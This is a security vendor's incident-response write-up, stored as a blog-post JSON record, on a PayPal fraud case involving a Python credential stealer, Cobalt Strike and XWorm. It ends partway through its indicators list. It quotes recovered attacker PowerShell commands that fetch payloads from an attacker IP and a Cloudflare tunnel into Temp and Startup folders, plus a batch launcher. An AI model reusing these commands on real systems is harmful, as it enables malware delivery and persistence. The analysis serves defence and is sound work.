{"id":64051,"date":"2026-02-20T17:01:12","date_gmt":"2026-02-20T16:01:12","guid":{"rendered":"https:\/\/www.secuinfra.com\/?p=64051"},"modified":"2026-02-20T17:04:20","modified_gmt":"2026-02-20T16:04:20","slug":"from-svchoss-to-payday","status":"publish","type":"post","link":"https:\/\/www.secuinfra.com\/en\/techtalk\/from-svchoss-to-payday\/","title":{"rendered":"From \u2018svchoss\u2019 to P(a)yday\u00a0"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_85 counter-flat ez-toc-counter ez-toc-white ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">[inhalt_uebersetzt]<\/p>\n<span class=\"ez-toc-title-toggle\"><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/www.secuinfra.com\/en\/techtalk\/from-svchoss-to-payday\/#Key_Findings\" >Key Findings&nbsp;<\/a><\/li><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/www.secuinfra.com\/en\/techtalk\/from-svchoss-to-payday\/#Introduction\" >Introduction\u00a0<\/a><\/li><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/www.secuinfra.com\/en\/techtalk\/from-svchoss-to-payday\/#Investigating_the_compromised_client\" >Investigating the compromised client\u00a0<\/a><\/li><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"https:\/\/www.secuinfra.com\/en\/techtalk\/from-svchoss-to-payday\/#Memory_Dump_Analysis\" >Memory Dump Analysis\u00a0<\/a><\/li><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"https:\/\/www.secuinfra.com\/en\/techtalk\/from-svchoss-to-payday\/#Conclusion\" >Conclusion<\/a><\/li><li class='ez-toc-page-1'><a class=\"ez-toc-link ez-toc-heading-6\" href=\"https:\/\/www.secuinfra.com\/en\/techtalk\/from-svchoss-to-payday\/#Indicators_of_Compromise\" >Indicators of Compromise\u00a0<\/a><\/li><\/ul><\/nav><\/div>\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Key_Findings\"><\/span>Key Findings&nbsp;<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The SECUINFRA Falcon Team discovered an unknown Python malware during a fraud investigation\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The threat actors made heavy use of obfuscation and disposable infrastructure\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>In addition to the custom malware off-the-shelf offensive tools like CobaltStrike were used\u00a0<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Introduction\"><\/span>Introduction\u00a0<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Alertness and vigilance are crucial in cybersecurity. When repeating this truism, most of us think about social engineering attacks and educating the user how to recognize a phishing mail or a scam call. However, an attentive user can also provide valuable insights on a more technical aspect.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">A recent incident response case was started, when the user noticed \u201estrange black windows\u201d on the desktop and took screenshots of them. This was accompanied by PayPal transfers from the user\u2019s account, not authorized by the user. &nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1099\" height=\"466\" src=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/1TT-1.png\" alt=\"\" class=\"wp-image-64093\" srcset=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/1TT-1.png 1099w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/1TT-1-800x339.png 800w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/1TT-1-768x326.png 768w\" sizes=\"(max-width: 1099px) 100vw, 1099px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Figure <\/em><em>1<\/em><em>: Screenshot captured by the victim, Console output hints at payload decoding and execution<\/em>&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Evidently, a script was run on the computer. The output should have been suppressed with the \u201cecho off\u201d command. Due to a problem in the script, the command was preceded with strange characters, rendering the command inexecutable. Because the screenshots were preserved, we can tell that, apparently, some kind of decoding action and injection took place.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Investigating_the_compromised_client\"><\/span>Investigating the compromised client\u00a0<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">We further investigated the computer by running the THOR Scanner, which gave us ample evidence to gain further understanding of the compromise.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The EventTraceLog BootPerfDiagLogger.etl contained numerous entries THOR extracted for further analysis. They were showing the following commandline:&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">CommandLine: &#8220;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe&#8221; -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -c &#8220;$ProgressPreference=&#8217;SilentlyContinue&#8217;; try { iwr &#8216;http:\/\/43.156.63[.]124\/svchoss.exe&#8217; -OutFile &#8216;C:\\Users\\admin\\AppData\\Local\\Temp\\svchoss.exe&#8217; -ErrorAction Stop; exit 0 } catch { exit 1 }&#8221;&nbsp;&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This code uses PowerShell, to download the file \u201csvchoss.exe\u201d from the IP address 43.156.63[.]124 and store it in a Temp directory. THOR recognized this filename as homomorphic abuse i.e.: It tried to resemble svchost.exe to fly under the radar.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The IP address it is downloaded from is part of the Autonomous System AS 132203, with the label \u201cTencent Building, Kejizhongyi Avenue\u201d, implicating Chinese Company Tencent in the attack. The IP address has been linked with numerous recent attacks.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Tencent is not only well-known Chinese multimedia company, due to its location, it is a popular place to host C2 infrastructure, especially for Chinese threat actors.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Furthermore, THOR pointed us to a range of suspicious .bat and .vbs files:&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Users\\admin\\AppData\\Roaming\\nuil.bat&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\12.bat&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\esae.bat&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\rech.bat&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\esae.vbs&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The corresponding events had timestamps of the same day as the screenshots.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Memory_Dump_Analysis\"><\/span>Memory Dump Analysis\u00a0<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">We followed these results up with an analysis of the memory dump we obtained from the customer. Using Volatility 3, we started with the usual modules.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Pstree, psxview, dlllist, ldr_modules, suspended_threads and cmdscan. Unfortunately, not to much avail. We did find a suspended explorer Thread with TID 8812. This could be related to the incident, as indicated in the screenshot, however it was a weak lead.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Running Strings64.exe on the memory dump, searching for strings with more than 5 characters, yielded more than 2 gigabytes of strings.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">A string search for the following IOCs we so far had obtained from THOR:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>svchoss\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>python\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>43.156.63.124\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>esae.vbs\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>nuil.bat\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>12.bat\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>esae.bat\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>rech.bat\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>we.bin\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>a.txt\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>x.txt\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>xro.py\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>SystemCache25\u00a0<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Yielded over 5000 results. It was clear, we had to narrow this down. Hits like&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Wikipedia.txt\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Nvida.txt\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>index.txt\u00a0<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">were removed&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Immediately conspicuous were the lines&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -c $ProgressPreference=&#8217;SilentlyContinue&#8217;; try { iwr &#8216;http:\/\/43.156.63[.]124\/svchoss.exe&#8217; -OutFile &#8216;C:\\Users\\admin\\AppData\\Local\\Temp\\svchoss.exe&#8217; -ErrorAction Stop; exit 0 } catch { exit 1 }&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">HostApplication=powershell -WindowStyle Hidden -c iwr &#8216;http:\/\/43.156.63[.]124\/esae.vbs&#8217; -OutFile &#8220;$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\esae.vbs&#8221;&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">HostApplication=powershell -Command Invoke-WebRequest -Uri &#8216;https:\/\/syracuse-seeks-wilson-row.trycloudflare[.]com\/of\/extracted\/12.bat&#8217; -OutFile &#8216;C:\\Users\\admin\\AppData\\Local\\Temp\\12.bat&#8217;&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">HostApplication=powershell -Command Invoke-WebRequest -Uri &#8216;https:\/\/syracuse-seeks-wilson-row.trycloudflare[.]com\/of\/extracted\/rech.bat&#8217; -OutFile &#8216;C:\\Users\\admin\\AppData\\Local\\Temp\\rech.bat&#8217;&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">http:\/\/msedge.b.tlu.dl.delivery.mp.microsoft[.]com\/filestreamingservice\/files\\rech.bat&#8217;&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">set DIR=%LOCALAPPDATA%\\Microsoft\\SystemCache25&nbsp;<br>&nbsp;&nbsp;&nbsp; if exist &#8220;%DIR%\\xro.py&#8221; (&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if exist &#8220;%DIR%\\we.bin&#8221; (&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if exist &#8220;%DIR%\\x.txt&#8221; (&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; python xro.py -i vue.bin -k o.txt&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">HostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -Command Copy-Item &#8216;\\\\syracuse-seeks-wilson-row.trycloudflare[.]com@SSL\\davwwwroot\\nuil.bat&#8217; &#8216;C:\\Users\\admin\\AppData\\Roaming\\nuil.bat&#8217;&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">We did not only confirm the presence of the screenshotted code, but we also generated further IOC and confirmed the maliciousness of the .bat and .vbs files found by THOR. The code indicates that the malicious actor deployed a python installation to the directory %LOCALAPPDATA%\\Microsoft\\SystemCache25.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The host syracuse-seeks-wilson-row.trycloudflare[.]com did no longer resolve at the time of the investigation. The domain trycloudflare[.]com is legit and part of cloudflare.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">msedge.b.tlu.dl.delivery.mp.microsoft[.]com is hosted by Fastly.Inc. The record was last updated on the day of the incident. The URL gave a 403 error, when we tried downloading the .bat file. The domain is belongs to Microsoft. Given the nature of this domain, it is most likely a red-hering for investigators to stumble across, not an actual second stage. The cloudflare domain is part of an ongoing trend among threat-actors, to use legit cloud services for C2 and payload delivery.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Furthermore, we were able to extract pristine examples of the screenshotted code from process memory:&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u00ef\u00bb\u00bf@echo off&nbsp;<br>set DIR=%LOCALAPPDATA%\\Microsoft\\SystemCache25&nbsp;<br>if exist &#8220;%DIR%\\python.exe&#8221; (&nbsp;<br>&nbsp;&nbsp;&nbsp; if exist &#8220;%DIR%\\xro.py&#8221; (&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if exist &#8220;%DIR%\\we.bin&#8221; (&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if exist &#8220;%DIR%\\x.txt&#8221; (&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; cd \/d &#8220;%DIR%&#8221;&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; python xro.py -i we.bin -k a.txt &nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )&nbsp;<br>&nbsp;&nbsp;&nbsp; )&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Unfortunately, it was not clearly associated with one specific process.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Seaching for known filenames in process handles and in filenames, gave us some hits for&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\\Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25&nbsp;<br>\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">And even \\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\python.exe&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">However, the only process still running with a handle to the SystemCache25 folder were two instances of explorer.exe. The processes associated with the files SystemCache25 and python.exe were already terminated when the image was taken.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The following filenames were identified as well, giving us further insight into the python installation in SystemCache25:&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\_ctypes.pyd&nbsp;<br>Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\libffi-8.dll&nbsp;<br>Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\python3.dll&nbsp;<br>Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\python.exe&nbsp;<br>Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\_zstd.pyd&nbsp;<br>Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\_lzma.pyd&nbsp;<br>Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\_bz2.pyd&nbsp;<br>Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\libffi-8.dll&nbsp;<br>Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\_ctypes.pyd&nbsp;<br>Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\vcruntime140.dll&nbsp;<br>Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25\\python315.dll&nbsp;<br>admin@file:\/\/\/C:\/Users\/admin\/AppData\/Local\/Microsoft\/SystemCache25\/x.txt&nbsp;<br>\\Device\\HarddiskVolume3\\Users\\admin\\AppData\\Local\\Microsoft\\SystemCache25&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">At this point, we would have normally started investigating artifacts from the system\u2019s hard drive. Unfortunately, it was not possible to acquire a triage or an image from the system\u2019s hard drive. Instead, we pivoted off the IP 43.156.63[.]124 that we found as a string in memory. We were able to identify and pull some of the payloads hosted there:&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">vs.exe&nbsp;<br>a57a08802002bb2e67f33143a17e027d07022e2aa3743840c8f18ced2c2b5217&nbsp;<br>some kind of shellcode loader?&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">012.exe&nbsp;<br>7a58c3106c38dbd56dda242deac02eea9bef8f064e62e6435849048fd036ceb1&nbsp;<br>XWorm RAT v5.6&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">2.4.exe&nbsp;<br>3d9239e8ed6b4f29f5754c934749110491ba821c31d758c2bc3e571c1375798a&nbsp;<br>HTran Tunneling Tool&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">02.08.2022.exe&nbsp;<br>40ef98e3251741b57792a42246eb238c4c12936d2db00bef2b8389b834ce7b52&nbsp;<br>Cobalt Strike Beacon&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">svchoss.exe&nbsp;<br>3483344d12e26ceb42c9c63d1d941c5309dd34d37ecb449922ef85647b726f58&nbsp;<br>PyInstaller Malware&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">esae.vbs was unfortunately not among these samples.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Additionally, multiple services such as an FTP, MySQL and CobaltStrike Team Server are hosted on this system.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Abuse.ch Threatfox lists multiple records of TCP Ports associated with CS and Empire activity:&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"570\" height=\"532\" src=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_02-1.png\" alt=\"\" class=\"wp-image-64094\"\/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Running 02.08.2022.exe through Sentinel-one\u2019s Cobalt Strike Parser confirmed that this is a Cobalt Strike Beacon. The IP adress for the C2 Server is identical to the address where the beacon is hosted.&nbsp;&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"908\" height=\"362\" src=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_03.png\" alt=\"\" class=\"wp-image-64095\" srcset=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_03.png 908w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_03-800x319.png 800w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_03-768x306.png 768w\" sizes=\"(max-width: 908px) 100vw, 908px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">With svchoss.exe at least being eponymous with the file downloaded to the compromised computer, we focused further investigations on this file. The file was known to VirusTotal as of December 05<sup>th<\/sup> 2025, with a score of 41\/71 engines detecting it as malicious. https:\/\/www.virustotal.com\/gui\/file\/3483344d12e26ceb42c9c63d1d941c5309dd34d37ecb449922ef85647b726f58\/details&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"908\" height=\"138\" src=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_04.png\" alt=\"\" class=\"wp-image-64096\" srcset=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_04.png 908w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_04-800x122.png 800w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_04-768x117.png 768w\" sizes=\"(max-width: 908px) 100vw, 908px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">We found several strings inside the .exe file refering to Python and cryptography modules of Python. VirusTotal also showed access to several files in&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>C:\\Users\\&lt;USER>\\AppData\\Local\\Chromium\\User Data\\AutofillStates\\\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>C:\\Users\\&lt;USER>\\AppData\\Local\\48e7a6ba7f72710ae085ed2aae203bf1\\&lt;USER>@DESKTOP-ET51AJO_en-US\\Wallets\\Edge_Wallet\\Edge_Exodus\\\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>C:\\Users\\&lt;USER>\\AppData\\Local\\48e7a6ba7f72710ae085ed2aae203bf1\\&lt;USER>@DESKTOP-ET51AJO_en-US\\Browsers\\Mozilla\\Firefox\\\u00a0<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">among others. This is indicative, that this is indeed a credential stealer.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">We proceeded to extract the content from this file with the tool pyinstxtractor-ng.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The script identified the python version as 314 and the following possible entrypoints:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>pyiboot01_bootstrap.py\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>pyi_rth_inspect.py\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>pyi_rth_pkgutil.pyc\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>pyi_rth_multiprocessing.pyc\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>pyi_rth_setuptools.pyc\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>test_expert_silent_temp.pyc\u00a0<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">The following files were extracted:&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"908\" height=\"254\" src=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_05.png\" alt=\"\" class=\"wp-image-64097\" srcset=\"https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_05.png 908w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_05-800x224.png 800w, https:\/\/www.secuinfra.com\/wp-content\/uploads\/svchoss_05-768x215.png 768w\" sizes=\"(max-width: 908px) 100vw, 908px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">The extraction of PYZ.pyz failed. Further files of notice were:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>python314.dll\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>the folder pyarmor_runtime_011117\u00a0<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">The python314.dll was present to confuse analysis tools with a wrong version number. The usage of pyarmor was implied from the presence of the related folder.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The file test_expert_silent_temp.pyc was immediately suspicious, as it is not a regular python file and we tried to decompile it with uncompyle6 this file, as well as all the other files had the unknown magic number 3627. We replaced it with A7 0D 0D 0A&nbsp; for Python 3.11 (3495). After this, the extraction still failed which as expected with pyarmor being present.&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">So far, we discovered the following techniques of obfuscation:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>wrong python version number\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>different filename (test_expert_silent_temp.pyc)\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>wrong magic byte\u00a0<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>pyarmor\u00a0<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Conclusion\"><\/span>Conclusion<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Our investigation confirmed the malicious presence on the computer and generated further IOC. THOR proved to be a great help in this, giving us an initial pivot point and strings to search in the system\u2019s memory. Without a full system triage, we could not completely reconstruct the incident and establish the relations between the various datapoints.&nbsp;&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">We could not reconstruct the initial access vector. Given that it was a regular endpoint that got infected, it is most likely that it included some kind of social engineering. A malicious web-download, or a malicious e-mail are the most probable scenarios.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Indicators_of_Compromise\"><\/span>Indicators of Compromise\u00a0<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Host-based artifacts&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><em>File Paths<\/em>&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">%USERPROFILE%\\AppData\\Local\\Temp\\svchoss.exe&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\python.exe&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\we.bin&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\a.txt&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\x.txt&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\_ctypes.pyd&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\libffi-8.dll&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\python3.dll&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\_zstd.pyd&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\_lzma.pyd&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\_bz2.pyd&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\libffi-8.dll&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\_ctypes.pyd&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\vcruntime140.dll&nbsp;<br>%USERPROFILE%\\AppData\\Local\\Microsoft\\SystemCache25\\python315.dll&nbsp;<br>C:\\Users\\admin\\AppData\\Roaming\\nuil.bat&nbsp;<br>C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\12.bat&nbsp;<br>C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\esae.bat&nbsp;<br>C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\rech.bat&nbsp;<br>C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\esae.vbs&nbsp;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Hashsums<\/em>&nbsp;<\/p>\n\n\n\n<p 